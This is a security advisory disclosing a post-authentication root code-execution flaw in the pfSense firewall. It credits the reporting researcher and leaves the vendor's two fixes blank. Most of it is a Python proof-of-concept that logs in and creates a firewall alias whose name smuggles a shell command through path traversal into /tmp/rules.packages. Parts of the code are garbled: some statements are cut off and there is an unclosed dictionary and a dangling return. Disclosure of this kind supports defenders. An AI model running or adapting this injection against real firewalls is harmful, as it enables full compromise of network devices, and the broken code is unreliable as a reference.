SSD Advisory – pfSense Post Auth RCE


A vulnerability in pfSense allows authenticated users to cause the product to execute arbitrary code – this in turn would allow an attacker to compromise the machine on which the pfSense is installed.

Vulnerability Summary

Due to the way pfSense, an open-sourced firewall, manages names of rules – an authenticated attacker that is able to modify firewall rules to cause the firewall to execute arbitrary code. The code in turn runs with elevated privileges (root) thus allowing to fully compromise the machine upon the pfSense is running on.


An independent security researcher, 이예랑 (@yelang123x), has reported this to the SSD Secure Disclosure program.

Vendor Response

The vendor has issued two fixes:

Fix 1:

Fix 2:


import requests
from bs4 import BeautifulSoup

url = 'https://x.y.z.a/'
session = requests.session()
id = input('id : ')
passwd = input('passwd : ')
cmd = input('cmd : ')  # don't allow string "/" example : echo pwn > test.php

if '/' in cmd:
    exit("'/' is not allow")

def csrf_token(url=url):
    global session
    result = session.get(url, verify=False)
    soup = BeautifulSoup(result.text, 'html.parser')
    csrf = soup.find_all(['script'])[2].decode()
    csrf_text = csrf[csrf.find('var csrfMagicToken = "') +
                     22:csrf.find('";var csrfMagicName')].split(',')
    result = csrf_text[0]+','+csrf_text[1]
    csrf_token = result
    return csrf_token

def login():
    global session
    data = {"usernamefld": id, "passwordfld": passwd,
            "login": "Sign In", "__csrf_magic": csrf_token()}
    login =, data=data, verify=False)

def add_gadget():
    global session
    add_url = url+'firewall_aliases_edit.php?tab=ip'
    data = {
        "__csrf_magic": csrf_token(),
        "name": '../../../tmp/rules.packages.|'+cmd+'|',
        "descr": "sadf",
        "type": "urltable",
        "address0": "",
        "address_subnet0": "128",
        "detail0": "",
        "tab": "ip",
        "origname": "",
        "save": "Saved"
    result =, data=data, verify=False)

def run_exec():
    global session
    result = session.get(url+'/status.php')
    if (result.text.find('pfSense: Status') != -1):
        return 'sucsess'
        return 'faild'




Get in touch